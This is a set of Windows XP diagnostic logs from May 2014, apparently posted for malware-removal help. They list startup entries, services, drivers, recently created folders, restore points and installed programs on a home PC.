O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: AVGIDSAgent - AVG Technologies CZ, s.r.o. - C:\Program Files\AVG\AVG2014\avgidsagent.exe
O23 - Service: AVG WatchDog (avgwd) - AVG Technologies CZ, s.r.o. - C:\Program Files\AVG\AVG2014\avgwdsvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: Pml Driver HPZ12 - Unknown owner - C:\WINDOWS\system32\HPZipm12.exe (file missing)

--
End of file - 7452 bytes

dds.txt log:

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 10.55.2
Run by HP_Owner at 13:28:27 on 2014-05-11
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.2039.1304 [GMT -5:00]
.
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {17DDD097-36FF-435F-9E1B-52D74245D6BF}
AV: Webroot AntiVirus with Spy Sweeper *Disabled/Updated* {77E10C7F-2CCA-4187-9394-BDBC267AD597}
.
============== Running Processes ================
.
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\ps2.exe
C:\Program Files\NETGEAR\WG311v3\WG311v3.exe
C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\issch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k imgsvc
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q305&bd=pavilion&pf=desktop&parm1=seconduser
uSearch Bar = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q305&bd=pavilion&pf=desktop&parm1=seconduser
uSearch Page = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q305&bd=pavilion&pf=desktop&parm1=seconduser
uDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=EN_US&c=Q305&bd=pavilion&pf=desktop&parm1=seconduser
uDefault_Search_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q305&bd=pavilion&pf=desktop&parm1=seconduser
mSearch Bar = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q305&bd=pavilion&pf=desktop
uSearchURL,(Default) = hxxp://www.google.com/keyword/%s
mSearchAssistant = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_US&c=Q305&bd=pavilion&pf=desktop
BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -
BHO: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - <orphaned>
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
BHO: JQSIEStartDetectorImpl Class: {E7E6F031-17CE-4C07-BC86-EABFE594F69C} -
TB: HP View: {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\program files\hp\digital imaging\bin\HPDTLK02.dll
TB: &Google: {2318C2B1-4965-11D4-9B18-009027A5CD4F} -
TB: HP View: {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\program files\hp\digital imaging\bin\HPDTLK02.dll
mRun: [LSBWatcher] "c:\hp\drivers\hplsbwatcher\lsburnwatcher.exe"
mRun: [ISUSPM Startup] "c:\progra~1\common~1\instal~1\update~1\ISUSPM.exe" -startup
mRun: [PS2] c:\windows\system32\ps2.exe
mRun: [AVG_UI] "c:\program files\avg\avg2014\avgui.exe" /TRAYONLY
mRun: [HP Component Manager] "c:\program files\hp\hpcoretech\hpcmpmgr.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [ISUSScheduler] "c:\progra~1\common~1\instal~1\update~1\issch.exe" -start
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\netgea~1.lnk - c:\program files\netgear\wg311v3\WG311v3.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: &Google Search - c:\program files\google\GoogleToolbar1.dll/cmsearch.html
IE: Backward Links - c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
IE: Cached Snapshot of Page - c:\program files\google\GoogleToolbar1.dll/cmcache.html
IE: E&xport to Microsoft Excel - c:\progra~1\mi1933~1\office11\EXCEL.EXE/3000
IE: Similar Pages - c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
IE: Translate into English - c:\program files\google\GoogleToolbar1.dll/cmtrans.html
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1362500382361
TCP: NameServer = 207.69.188.185 207.69.188.186
TCP: Interfaces\{8D5C660C-BC52-4E6C-9CE6-36BD994DC836} : DHCPNameServer = 207.69.188.185 207.69.188.186
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -
Notify: igfxcui - igfxsrvc.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
.
================= FIREFOX ===================
.
FF - ProfilePath -
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHX;AVGIDSHX;c:\windows\system32\drivers\avgidshx.sys [2012-4-19 150296]
R0 Avglogx;AVG Logging Driver;c:\windows\system32\drivers\avglogx.sys [2012-8-9 238872]
R0 Avgmfx86;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\drivers\avgmfx86.sys [2011-12-23 108312]
R0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\drivers\avgrkx86.sys [2012-1-31 28440]
R1 Avgdiskx;AVG Disk Driver;c:\windows\system32\drivers\avgdiskx.sys [2013-8-1 123160]
R1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\drivers\avgidsdriverx.sys [2012-8-13 199960]
R1 AVGIDSShim;AVGIDSShim;c:\windows\system32\drivers\avgidsshimx.sys [2012-8-10 22296]
R1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\drivers\avgldx86.sys [2012-2-22 193304]
R1 Avgtdix;AVG TDI Driver;c:\windows\system32\drivers\avgtdix.sys [2012-2-22 211224]
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\avg\avg2014\avgidsagent.exe [2014-4-18 3645456]
R2 avgwd;AVG WatchDog;c:\program files\avg\avg2014\avgwdsvc.exe [2014-3-27 291912]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-7-20 754856]
.
=============== Created Last 30 ================
.
2014-05-11 16:19:21 -------- d-----w- c:\documents and settings\hp_owner.ellenspc\local settings\application data\Adobe
2014-05-11 15:25:42 -------- d-sh--w- c:\documents and settings\hp_owner.ellenspc\PrivacIE
2014-05-11 15:14:30 -------- d-----w- c:\documents and settings\hp_owner.ellenspc\application data\AVG2014
2014-05-11 15:08:04 -------- d-sh--w- c:\documents and settings\hp_owner.ellenspc\IETldCache
2014-05-11 07:44:15 -------- d-----w- c:\windows\system32\wbem\repository\FS
2014-05-11 07:44:15 -------- d-----w- c:\windows\system32\wbem\Repository
2014-05-11 06:38:58 -------- d-----w- c:\documents and settings\all users\application data\IePluginService
2014-05-11 06:38:55 -------- d-----w- c:\program files\SupTab
2014-05-11 06:38:55 -------- d-----w- c:\documents and settings\all users\application data\WPM
2014-05-11 06:34:59 -------- d-----w- c:\program files\MSR
2014-04-23 17:56:09 145408 ----a-w- c:\windows\system32\javacpl.cpl
2014-04-23 17:55:50 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
.
==================== Find3M ====================
.
2014-04-23 17:51:29 692400 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-04-23 17:51:28 70832 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-04-18 20:02:04 199960 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-03-31 21:11:58 211224 ----a-w- c:\windows\system32\drivers\avgtdix.sys
2014-03-28 03:15:18 193304 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2014-03-28 03:14:40 123160 ----a-w- c:\windows\system32\drivers\avgdiskx.sys
2014-03-28 03:04:22 150296 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-03-28 03:04:02 238872 ----a-w- c:\windows\system32\drivers\avglogx.sys
2014-03-28 03:03:22 28440 ----a-w- c:\windows\system32\drivers\avgrkx86.sys
2014-03-28 03:03:20 22296 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
2014-03-06 17:59:23 920064 ----a-w- c:\windows\system32\wininet.dll
2014-03-06 17:59:22 43520 ----a-w- c:\windows\system32\licmgr10.dll
2014-03-06 17:59:22 18944 ----a-w- c:\windows\system32\corpol.dll
2014-03-06 17:59:22 1469440 ------w- c:\windows\system32\inetcpl.cpl
2014-03-06 00:46:54 385024 ----a-w- c:\windows\system32\html.iec
2014-02-26 01:59:05 13312 ------w- c:\windows\system32\xp_eos.exe
.
============= FINISH: 13:29:33.25 ===============

attach.txt log:

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume2
Install Date: 8/14/2005 6:48:25 PM
System Uptime: 5/11/2014 9:55:43 AM (4 hours ago)
.
Motherboard: ASUSTek Computer INC. | | Guppy
Processor: Intel(R) Celeron(R) CPU 2.93GHz | PGA 478 | 2933/133mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 86 GiB total, 59.299 GiB free.
D: is FIXED (FAT32) - 7 GiB total, 1.834 GiB free.
E: is CDROM ()
J: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP939: 1/24/2014 11:20:22 PM - Software Distribution Service 3.0
RP940: 1/28/2014 11:31:05 AM - System Checkpoint
RP941: 1/30/2014 9:35:41 AM - System Checkpoint
RP942: 2/1/2014 2:30:40 PM - System Checkpoint
RP943: 2/4/2014 4:25:44 PM - System Checkpoint
RP944: 2/8/2014 1:34:44 PM - System Checkpoint
RP945: 2/9/2014 3:03:04 PM - Installed Java 7 Update 51
RP946: 2/12/2014 6:02:32 PM - Installed AVG 2014
RP947: 2/12/2014 6:09:29 PM - Removed AVG 2014
RP948: 2/17/2014 9:55:43 AM - System Checkpoint
RP949: 2/19/2014 12:56:22 PM - System Checkpoint
RP950: 2/20/2014 8:43:55 PM - System Checkpoint
RP951: 2/22/2014 1:50:42 PM - System Checkpoint
RP952: 2/24/2014 8:36:13 AM - System Checkpoint
RP953: 2/26/2014 10:39:00 AM - System Checkpoint
RP954: 3/1/2014 9:44:27 AM - System Checkpoint
RP955: 3/2/2014 10:51:39 AM - System Checkpoint
RP956: 3/4/2014 10:48:46 AM - System Checkpoint
RP957: 3/5/2014 4:54:15 PM - System Checkpoint
RP958: 3/6/2014 7:40:22 PM - System Checkpoint
RP959: 3/10/2014 11:27:03 AM - System Checkpoint
RP960: 3/12/2014 12:57:05 AM - System Checkpoint
RP961: 3/13/2014 9:14:02 AM - System Checkpoint
RP962: 12/31/2002 10:20:57 PM - Software Distribution Service 3.0
RP963: 3/13/2014 3:38:54 PM - Software Distribution Service 3.0
RP964: 3/14/2014 9:09:55 PM - System Checkpoint
RP965: 3/16/2014 8:58:24 AM - System Checkpoint
RP966: 3/21/2014 2:52:09 AM - System Checkpoint
RP967: 3/22/2014 2:53:11 PM - System Checkpoint
RP968: 3/25/2014 12:10:53 AM - System Checkpoint
RP969: 3/28/2014 12:52:53 AM - System Checkpoint
RP970: 3/28/2014 5:56:12 PM - Software Distribution Service 3.0
RP971: 3/28/2014 8:40:01 PM - Software Distribution Service 3.0
RP972: 3/28/2014 10:17:28 PM - Software Distribution Service 3.0
RP973: 3/30/2014 9:57:31 AM - System Checkpoint
RP974: 4/1/2014 10:03:27 AM - System Checkpoint
RP975: 4/3/2014 2:18:56 PM - System Checkpoint
RP976: 4/4/2014 9:46:23 PM - System Checkpoint
RP977: 4/6/2014 9:53:03 AM - System Checkpoint
RP978: 4/7/2014 8:45:46 PM - System Checkpoint
RP979: 4/12/2014 10:04:58 AM - System Checkpoint
RP980: 4/13/2014 11:37:49 AM - Software Distribution Service 3.0
RP981: 4/14/2014 1:00:45 PM - System Checkpoint
RP982: 4/15/2014 10:48:45 PM - System Checkpoint
RP983: 4/17/2014 4:50:43 PM - System Checkpoint
RP984: 4/20/2014 9:26:30 AM - System Checkpoint
RP985: 4/23/2014 12:53:13 PM - Installed Java 7 Update 55
RP986: 4/28/2014 12:21:25 PM - Installed AVG 2014
RP987: 4/28/2014 12:26:55 PM - Removed AVG 2014
RP988: 4/29/2014 5:28:24 PM - System Checkpoint
RP989: 5/1/2014 8:37:40 PM - System Checkpoint
RP990: 5/4/2014 2:50:36 PM - System Checkpoint
RP991: 5/8/2014 3:20:30 PM - System Checkpoint
RP992: 5/8/2014 9:04:13 PM - Software Distribution Service 3.0
RP993: 5/11/2014 2:04:06 AM - Restore Operation
RP994: 5/11/2014 2:13:07 AM - Restore Operation
RP995: 5/11/2014 2:34:12 AM - Restore Operation
.
==== Installed Programs ======================
.
Actiontec Gateway
Adobe Flash Player 13 Plugin
Adobe Reader XI (11.0.06)
Amazon Kindle
Apple Application Support
Apple Mobile Device Support
Apple Software Update
AutoUpdate
AVG 2011
AVG 2014
BufferChm
CameraDrivers
Canon MP Navigator EX 2.1
Canon MX330 series MP Drivers
Canon MX330 series User Registration
CDisplay
Copy
CP_AtenaShokunin1Config
cp_dwSharkTaleAlbums1
cp_dwSharkTaleCards1
cp_dwShrek2Albums1
cp_dwShrek2Cards1
CP_PLSBusinessFlyers
CreativeProjects
CreativeProjectsTemplates
CueTour
Data Fax SoftModem with SmartCP
Destinations
Director
DivX
DivX Player
DocProc
DocumentViewer
GIMP 2.8.4
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Hotfix for Windows Internet Explorer 7 (KB947864)
Hotfix for Windows Media Format 11 SDK (KB929399)
Hotfix for Windows Media Player 11 (KB939683)
Hotfix for Windows XP (KB2158563)
Hotfix for Windows XP (KB2443685)
Hotfix for Windows XP (KB2570791)
Hotfix for Windows XP (KB2633952)
Hotfix for Windows XP (KB2756822)
Hotfix for Windows XP (KB2779562)
Hotfix for Windows XP (KB915800-v4)
Hotfix for Windows XP (KB952287)
Hotfix for Windows XP (KB954550-v5)
Hotfix for Windows XP (KB961118)
Hotfix for Windows XP (KB970653-v3)
Hotfix for Windows XP (KB976098-v2)
Hotfix for Windows XP (KB979306)
Hotfix for Windows XP (KB981793)
HP Boot Optimizer
HP Image Zone 4.8.6
HP Image Zone Plus 4.8.6
HP Photosmart Cameras 4.5
HP Product Assistant
HP Software Update
HPIZplus450
HpSdpAppCoreApp
HPSystemDiagnostics
InstantShare
Intel(R) Extreme Graphics Driver
InterVideo WinDVD Player
iTunes
Java 7 Update 55
Java Auto Updater
KBD
Macromedia Flash Player 8
Magic Set Editor 2.0.0
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Security Update (KB2698023)
Microsoft .NET Framework 1.1 Security Update (KB2833941)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4 Client Profile
Microsoft Base Smart Card Cryptographic Service Provider Package
Microsoft Compression Client Pack 1.0 for Windows XP
Microsoft Internationalized Domain Names Mitigation APIs
Microsoft National Language Support Downlevel APIs
Microsoft Office Professional Edition 2003
Microsoft Office Standard Edition 2003
Microsoft Plus! Digital Media Edition Installer
Microsoft User-Mode Driver Framework Feature Pack 1.0
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
Mozilla Firefox 28.0 (x86 en-US)
Mozilla Maintenance Service
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
NETGEAR WG311v3 PCI Adapter
PanoStandAlone
PC-Doctor for Windows
PhotoGallery
PrintScreen
PS2
Python 2.2 pywin32 extensions (build 203)
Python 2.2.3
QFolder
QuickProjects
QuickTime
Qwest eChat Support Tools
Revo Uninstaller 1.93
ScannerCopy
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2832407)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628v2)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2858302v2)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2861188)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2898855v2)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2901110v2)
Security Update for Microsoft Windows (KB2564958)
Security Update for Step By Step Interactive Training (KB898458)
Security Update for Step By Step Interactive Training (KB923723)
Security Update for Windows Internet Explorer 7 (KB938127)
Security Update for Windows Internet Explorer 7 (KB939653)
Security Update for Windows Internet Explorer 7 (KB942615)
Security Update for Windows Internet Explorer 7 (KB944533)
Security Update for Windows Internet Explorer 7 (KB950759)
Security Update for Windows Internet Explorer 7 (KB953838)
Security Update for Windows Internet Explorer 7 (KB956390)
Security Update for Windows Internet Explorer 7 (KB958215)
Security Update for Windows Internet Explorer 7 (KB960714)
Security Update for Windows Internet Explorer 7 (KB961260)
Security Update for Windows Internet Explorer 7 (KB963027)
Security Update for Windows Internet Explorer 7 (KB969897)
Security Update for Windows Internet Explorer 8 (KB2183461)
Security Update for Windows Internet Explorer 8 (KB2360131)
Security Update for Windows Internet Explorer 8 (KB2416400)
Security Update for Windows Internet Explorer 8 (KB2482017)
Security Update for Windows Internet Explorer 8 (KB2497640)
Security Update for Windows Internet Explorer 8 (KB2510531)
Security Update for Windows Internet Explorer 8 (KB2530548)
Security Update for Windows Internet Explorer 8 (KB2544521)
Security Update for Windows Internet Explorer 8 (KB2559049)
Security Update for Windows Internet Explorer 8 (KB2586448)
Security Update for Windows Internet Explorer 8 (KB2618444)
Security Update for Windows Internet Explorer 8 (KB2647516)
Security Update for Windows Internet Explorer 8 (KB2675157)
Security Update for Windows Internet Explorer 8 (KB2699988)
Security Update for Windows Internet Explorer 8 (KB2722913)
Security Update for Windows Internet Explorer 8 (KB2744842)
Security Update for Windows Internet Explorer 8 (KB2761465)
Security Update for Windows Internet Explorer 8 (KB2792100)
Security Update for Windows Internet Explorer 8 (KB2797052)
Security Update for Windows Internet Explorer 8 (KB2799329)
Security Update for Windows Internet Explorer 8 (KB2809289)
Security Update for Windows Internet Explorer 8 (KB2817183)
Security Update for Windows Internet Explorer 8 (KB2829530)
Security Update for Windows Internet Explorer 8 (KB2838727)
Security Update for Windows Internet Explorer 8 (KB2846071)
Security Update for Windows Internet Explorer 8 (KB2847204)
Security Update for Windows Internet Explorer 8 (KB2862772)
Security Update for Windows Internet Explorer 8 (KB2870699)
Security Update for Windows Internet Explorer 8 (KB2879017)
Security Update for Windows Internet Explorer 8 (KB2888505)
Security Update for Windows Internet Explorer 8 (KB2898785)
Security Update for Windows Internet Explorer 8 (KB2909210)
Security Update for Windows Internet Explorer 8 (KB2925418)
Security Update for Windows Internet Explorer 8 (KB2936068)
Security Update for Windows Internet Explorer 8 (KB969897)
Security Update for Windows Internet Explorer 8 (KB971961)
Security Update for Windows Internet Explorer 8 (KB972260)
Security Update for Windows Internet Explorer 8 (KB974455)
Security Update for Windows Internet Explorer 8 (KB981332)
Security Update for Windows Internet Explorer 8 (KB982381)
Security Update for Windows Media Player (KB2378111)
Security Update for Windows Media Player (KB2834904-v2)
Security Update for Windows Media Player (KB2834904)
Security Update for Windows Media Player (KB911564)
Security Update for Windows Media Player (KB952069)
Security Update for Windows Media Player (KB954155)
Security Update for Windows Media Player (KB968816)
Security Update for Windows Media Player (KB973540)
Security Update for Windows Media Player (KB975558)
Security Update for Windows Media Player (KB978695)
Security Update for Windows Media Player 10 (KB911565)
Security Update for Windows Media Player 10 (KB917734)
Security Update for Windows Media Player 10 (KB936782)
Security Update for Windows Media Player 11 (KB954154)
Security Update for Windows Media Player 6.4 (KB925398)
Security Update for Windows XP (KB2079403)
Security Update for Windows XP (KB2115168)
Security Update for Windows XP (KB2121546)
Security Update for Windows XP (KB2160329)
Security Update for Windows XP (KB2229593)
Security Update for Windows XP (KB2259922)
Security Update for Windows XP (KB2279986)
Security Update for Windows XP (KB2286198)
Security Update for Windows XP (KB2296011)
Security Update for Windows XP (KB2296199)
Security Update for Windows XP (KB2347290)
Security Update for Windows XP (KB2360937)
Security Update for Windows XP (KB2387149)
Security Update for Windows XP (KB2393802)
Security Update for Windows XP (KB2412687)
Security Update for Windows XP (KB2419632)
Security Update for Windows XP (KB2423089)
Security Update for Windows XP (KB2436673)
Security Update for Windows XP (KB2440591)
Security Update for Windows XP (KB2443105)
Security Update for Windows XP (KB2476490)
Security Update for Windows XP (KB2476687)
Security Update for Windows XP (KB2478960)
Security Update for Windows XP (KB2478971)
Security Update for Windows XP (KB2479628)
Security Update for Windows XP (KB2479943)
Security Update for Windows XP (KB2481109)
Security Update for Windows XP (KB2483185)
Security Update for Windows XP (KB2485376)
Security Update for Windows XP (KB2485663)
Security Update for Windows XP (KB2503658)
Security Update for Windows XP (KB2503665)
Security Update for Windows XP (KB2506212)
Security Update for Windows XP (KB2506223)
Security Update for Windows XP (KB2507618)
Security Update for Windows XP (KB2507938)
Security Update for Windows XP (KB2508272)
Security Update for Windows XP (KB2508429)
Security Update for Windows XP (KB2509553)
Security Update for Windows XP (KB2511455)
Security Update for Windows XP (KB2524375)
Security Update for Windows XP (KB2535512)
Security Update for Windows XP (KB2536276-v2)
Security Update for Windows XP (KB2536276)
Security Update for Windows XP (KB2544893-v2)
Security Update for Windows XP (KB2544893)
Security Update for Windows XP (KB2555917)
Security Update for Windows XP (KB2562937)
Security Update for Windows XP (KB2566454)
Security Update for Windows XP (KB2567053)
Security Update for Windows XP (KB2567680)
Security Update for Windows XP (KB2570222)
Security Update for Windows XP (KB2570947)
Security Update for Windows XP (KB2584146)
Security Update for Windows XP (KB2585542)
Security Update for Windows XP (KB2592799)
Security Update for Windows XP (KB2598479)
Security Update for Windows XP (KB2603381)
Security Update for Windows XP (KB2618451)
Security Update for Windows XP (KB2619339)
Security Update for Windows XP (KB2620712)
Security Update for Windows XP (KB2621440)
Security Update for Windows XP (KB2624667)
Security Update for Windows XP (KB2631813)
Security Update for Windows XP (KB2633171)
Security Update for Windows XP (KB2639417)
Security Update for Windows XP (KB2641653)
Security Update for Windows XP (KB2646524)
Security Update for Windows XP (KB2647518)
Security Update for Windows XP (KB2653956)
Security Update for Windows XP (KB2655992)
Security Update for Windows XP (KB2659262)
Security Update for Windows XP (KB2660465)
Security Update for Windows XP (KB2661637)
Security Update for Windows XP (KB2676562)
Security Update for Windows XP (KB2685939)
Security Update for Windows XP (KB2686509)
Security Update for Windows XP (KB2691442)
Security Update for Windows XP (KB2695962)
Security Update for Windows XP (KB2698365)
Security Update for Windows XP (KB2705219)
Security Update for Windows XP (KB2707511)
Security Update for Windows XP (KB2709162)
Security Update for Windows XP (KB2712808)
Security Update for Windows XP (KB2718523)
Security Update for Windows XP (KB2719985)
Security Update for Windows XP (KB2723135)
Security Update for Windows XP (KB2724197)
Security Update for Windows XP (KB2727528)
Security Update for Windows XP (KB2731847)
Security Update for Windows XP (KB2753842-v2)
Security Update for Windows XP (KB2753842)
Security Update for Windows XP (KB2757638)
Security Update for Windows XP (KB2758857)
Security Update for Windows XP (KB2761226)
Security Update for Windows XP (KB2770660)
Security Update for Windows XP (KB2778344)
Security Update for Windows XP (KB2779030)
Security Update for Windows XP (KB2780091)
Security Update for Windows XP (KB2799494)
Security Update for Windows XP (KB2802968)
Security Update for Windows XP (KB2807986)
Security Update for Windows XP (KB2808735)
Security Update for Windows XP (KB2813170)
Security Update for Windows XP (KB2813345)
Security Update for Windows XP (KB2820197)
Security Update for Windows XP (KB2820917)
Security Update for Windows XP (KB2829361)
Security Update for Windows XP (KB2834886)
Security Update for Windows XP (KB2839229)
Security Update for Windows XP (KB2845187)
Security Update for Windows XP (KB2847311)
Security Update for Windows XP (KB2849470)
Security Update for Windows XP (KB2850851)
Security Update for Windows XP (KB2850869)
Security Update for Windows XP (KB2859537)
Security Update for Windows XP (KB2862152)
Security Update for Windows XP (KB2862330)
Security Update for Windows XP (KB2862335)
Security Update for Windows XP (KB2864063)
Security Update for Windows XP (KB2868038)
Security Update for Windows XP (KB2868626)
Security Update for Windows XP (KB2876217)
Security Update for Windows XP (KB2876315)
Security Update for Windows XP (KB2876331)
Security Update for Windows XP (KB2883150)
Security Update for Windows XP (KB2892075)
Security Update for Windows XP (KB2893294)
Security Update for Windows XP (KB2893984)
Security Update for Windows XP (KB2898715)
Security Update for Windows XP (KB2900986)
Security Update for Windows XP (KB2914368)
Security Update for Windows XP (KB2916036)
Security Update for Windows XP (KB2922229)
Security Update for Windows XP (KB2929961)
Security Update for Windows XP (KB2930275)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB923689)
Security Update for Windows XP (KB938464)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950760)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951066)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB951376)
Security Update for Windows XP (KB951698)
Security Update for Windows XP (KB951748)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB953839)
Security Update for Windows XP (KB954211)
Security Update for Windows XP (KB954459)
Security Update for Windows XP (KB954600)
Security Update for Windows XP (KB955069)
Security Update for Windows XP (KB956391)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB956802)
Security Update for Windows XP (KB956803)
Security Update for Windows XP (KB956841)
Security Update for Windows XP (KB956844)
Security Update for Windows XP (KB957095)
Security Update for Windows XP (KB957097)
Security Update for Windows XP (KB958644)
Security Update for Windows XP (KB958687)
Security Update for Windows XP (KB958690)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB959426)
Security Update for Windows XP (KB960225)
Security Update for Windows XP (KB960715)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB960859)
